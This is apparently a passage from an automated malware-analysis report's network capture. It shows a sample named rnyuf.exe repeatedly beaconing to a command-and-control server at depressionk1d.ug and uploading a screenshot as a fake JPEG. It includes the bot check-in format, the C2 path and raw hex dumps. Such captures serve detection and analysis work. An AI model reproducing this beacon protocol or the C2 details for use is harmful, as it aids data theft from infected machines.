                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:20.130147934 CET2667OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:20.130192995 CET2690OUTData Raw: a1 aa ea 32 eb 7a b5 c4 b1 df db 5f a9 31 ba f5 28 ca cd 9f 62 38 18 e3 f0 af 25 f8 9b 7a d1 fc 48 d6 d0 45 bb 13 8e 77 7f b2 b5 85 26 b5 e2 38 e0 8a 79 75 3d 55 61 9b 77 95 23 4f 20 57 db c1 da 73 83 8e f8 ac c9 ee 26 ba 99 a6 b8 9a 49 a5 6f bc
                          Data Ascii: 2z_1(b8%zHEw&8yu=Uaw#O Ws&Io1f=&K?ccxj>T5$Mn$L(u*Jb9g*=gs{QgWohN\FExrTE)b1(![Y`)ff<R}}
                          Nov 12, 2021 22:23:20.152677059 CET2694OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:20.152735949 CET2704OUTData Raw: 03 c5 28 3c d3 41 a5 26 98 ac 48 0d 3b 39 a8 f7 52 83 54 89 68 7e 69 41 a6 e6 8a a2 6c 48 0d 3b 35 18 a7 53 4c 96 87 e6 9d 9a 8f 34 a0 fb d5 5c 9b 12 03 4e 06 a2 06 9c 0d 32 5a 25 cd 00 d3 33 4a 1a 98 ac 49 9a 01 a6 73 4f 14 c9 b0 e1 52 2f 15 18
                          Data Ascii: (<A&H;9RTh~iAlH;5SL4\N2Z%3JIsOR/2.iY2,M54h<3<SsLICS3OwFX7TwR'}@;4L$*i<}89iAqBxZvO(n??3!T6PY?G:nf;r
                          Nov 12, 2021 22:23:20.152771950 CET2720OUTData Raw: d1 0a 29 c2 80 28 02 a0 d1 21 45 2e 38 a0 0a 5c 71 48 a1 cb 52 2d 30 0c 53 85 4b 2d 12 0a 95 7a 54 42 a4 02 b3 66 d1 24 a5 c7 14 d1 4e 15 0c b1 40 af 29 f8 a7 f7 ad 3d dd cf f2 af 57 1d 6b ca 3e 2a 63 cc b2 fa bf f4 ad 68 7c 44 55 e8 78 ae 68 cf
                          Data Ascii: )(!E.8\qHR-0SK-zTBf$N@)=Wk>*ch|DUxh+M@<Gy%jng#3u\ ua[Of.<^5dUWVGQS[vPo+43=4ohdy6||MbzC\CW?9+
                          Nov 12, 2021 22:23:20.152802944 CET2731OUTData Raw: 23 55 39 3d c7 8e b4 f1 c1 a6 03 c5 2e 6a 6c 5a 64 81 b9 a7 a9 cd 43 de a4 5a 96 8d 22 c9 29 c3 a5 34 52 d4 b3 64 c9 01 c0 a7 83 51 03 4f 0c 2a 19 69 92 66 9c 2a 2d d4 a1 8d 4b 46 89 93 8a 5c d4 60 9a 77 6e 4e 2a 5a 34 4c 90 1c 53 81 15 01 92 25
                          Data Ascii: #U9=.jlZdCZ")4RdQO*if*-KF\`wnN*Z4LS%(iZEP~#{!Ht}+<v?io\_@BQo[uf% XkWEWkVK1iS<z%[W099 w'x`|>svO<c8<?Q}[Ya
                          Nov 12, 2021 22:23:20.152870893 CET2734OUTData Raw: ea da 1b 26 9a de c2 45 56 43 3a bb b1 39 89 f0 15 42 75 c7 24 e4 d5 29 3c 31 61 71 79 69 0e 97 7e 6e 60 7d 5a 6b 09 ae 43 29 50 8b b5 96 41 81 d0 a1 62 4e 48 f9 0e 2a bd ac 39 ad fd 74 ff 00 31 7b 39 5a ff 00 d6 d7 39 4c 52 e2 bb 18 34 0d 0a f3
                          Data Ascii: &EVC:9Bu$)<1aqyi~n`}ZkC)PAbNH*9t1{9Z9LR4N:kq{cy}((<yX-|qK&TZq;/)Sw$(jEt:6jsZo[ilIs6c~uV'sj][j70e39n)g*3HO05D
                          Nov 12, 2021 22:23:20.200901985 CET2762INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:20 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          210192.168.2.450004178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:01.262347937 CET9381OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:01.289114952 CET9390INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:01 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          211192.168.2.450005178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:01.420886993 CET9414OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:01.446050882 CET9414INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:01 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          212192.168.2.450007178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:01.578301907 CET9416OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:01.605346918 CET9417INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:01 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          213192.168.2.450009178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:01.763458967 CET9439OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:01.791773081 CET9441INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:01 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          214192.168.2.450010178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:01.830159903 CET9466OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:01.830241919 CET9466OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:01.830441952 CET9476OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:01.830527067 CET9479OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:01.855091095 CET9533OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:01.855128050 CET9541OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:24:01.855179071 CET9548OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:24:01.855192900 CET9550OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:24:01.877657890 CET9559OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:24:01.877724886 CET9572OUTData Raw: 61 82 fe 55 f8 9d 67 c5 9b 54 b0 f8 61 15 9c 45 8c 70 4b 04 4a 58 f2 42 82 06 7d f8 af 9e ab bd f1 67 c5 1b ef 16 e8 6d a5 dc e9 d6 f0 21 91 64 0f 13 b6 41 1f 5f ad 70 55 78 78 4e 31 7c db dc 55 e5 19 49 72 ed 60 a5 a4 a2 b7 30 0a 29 45 06 80 0a
                          Data Ascii: aUgTaEpKJXB}gm!dA_pUxxN1|UIr`0)E(4;Pzm8P@:AKLBh0E%-Mj-Q@Rm(!L8UNDQL)TKN"GR3N+Si0m(H\QLC?0SZ%)hD@RFSMT'GjL
                          Nov 12, 2021 22:24:01.877798080 CET9585OUTData Raw: 34 fe b0 fb 69 7b 7e 2f fe 1f fe 18 1e 1d 5e d7 fe bf ad 3d 4e 7e 2d 1b 55 9a c1 6f e2 d2 ef a4 b3 66 08 b7 09 6e e6 32 c4 ed 00 30 18 ce 78 c7 af 15 0c 76 37 93 cc f0 c3 69 71 24 a8 c1 1e 34 89 8b 2b 16 0a 01 00 64 12 c4 0c 7a 9c 56 ef 8a b4 dd
                          Data Ascii: 4i{~/^=N~-Uofn20xv7iq$4+dzVrMf]o4Ffr3[lqx[RSR=+]v/CIa.usFXzqU5'4/."{6FUf<x:j:h%i
                          Nov 12, 2021 22:24:01.925518036 CET9755INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:01 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          215192.168.2.450011178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:01.938663006 CET9756OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:01.966550112 CET9757INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:01 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          216192.168.2.450013178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:02.190659046 CET9758OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:02.219743967 CET9758INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:02 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          217192.168.2.450015178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:02.356617928 CET9762OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:02.382848978 CET9763INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:02 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          218192.168.2.450017178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:02.385946989 CET9763OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:02.386378050 CET9763OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:02.386569977 CET9773OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:02.386697054 CET9776OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:02.409090996 CET9789OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:02.409181118 CET9795OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:24:02.409241915 CET9802OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:24:02.431680918 CET9815OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:24:02.431809902 CET9836OUTData Raw: 61 82 fe 55 f8 9d 67 c5 9b 54 b0 f8 61 15 9c 45 8c 70 4b 04 4a 58 f2 42 82 06 7d f8 af 9e ab bd f1 67 c5 1b ef 16 e8 6d a5 dc e9 d6 f0 21 91 64 0f 13 b6 41 1f 5f ad 70 55 78 78 4e 31 7c db dc 55 e5 19 49 72 ed 60 a5 a4 a2 b7 30 0a 29 45 06 80 0a
                          Data Ascii: aUgTaEpKJXB}gm!dA_pUxxN1|UIr`0)E(4;Pzm8P@:AKLBh0E%-Mj-Q@Rm(!L8UNDQL)TKN"GR3N+Si0m(H\QLC?0SZ%)hD@RFSMT'GjL
                          Nov 12, 2021 22:24:02.431902885 CET9857OUTData Raw: 23 55 39 3d c7 8e b4 f1 c1 a6 03 c5 2e 6a 6c 5a 64 81 b9 a7 a9 cd 43 de a4 5a 96 8d 22 c9 29 c3 a5 34 52 d4 b3 64 c9 01 c0 a7 83 51 03 4f 0c 2a 19 69 92 66 9c 2a 2d d4 a1 8d 4b 46 89 93 8a 5c d4 60 9a 77 6e 4e 2a 5a 34 4c 90 1c 53 81 15 01 92 25
                          Data Ascii: #U9=.jlZdCZ")4RdQO*if*-KF\`wnN*Z4LS%(iZEP~#{!Ht}+<v?io\_@BQo[uf% XkWEWkVK1iS<z%[W099 w'x`|>svO<c8<?Q}[Ya
                          Nov 12, 2021 22:24:02.454257965 CET9866OUTData Raw: 41 26 9f 9d c5 ce ff 00 0b 1a fe 2b be b6 d5 3c 61 ac 5f d9 49 e6 db 5c 5d 3c 91 3e d2 bb 94 9e 0e 08 04 7e 35 91 49 4a 29 c2 2a 11 51 5d 09 93 bb b9 d2 78 3b 52 b6 d3 67 d5 c5 c5 ed 9d 9b dd 69 cd 04 32 5e db 1b 88 77 f9 b1 b6 19 02 3e 46 15 ba
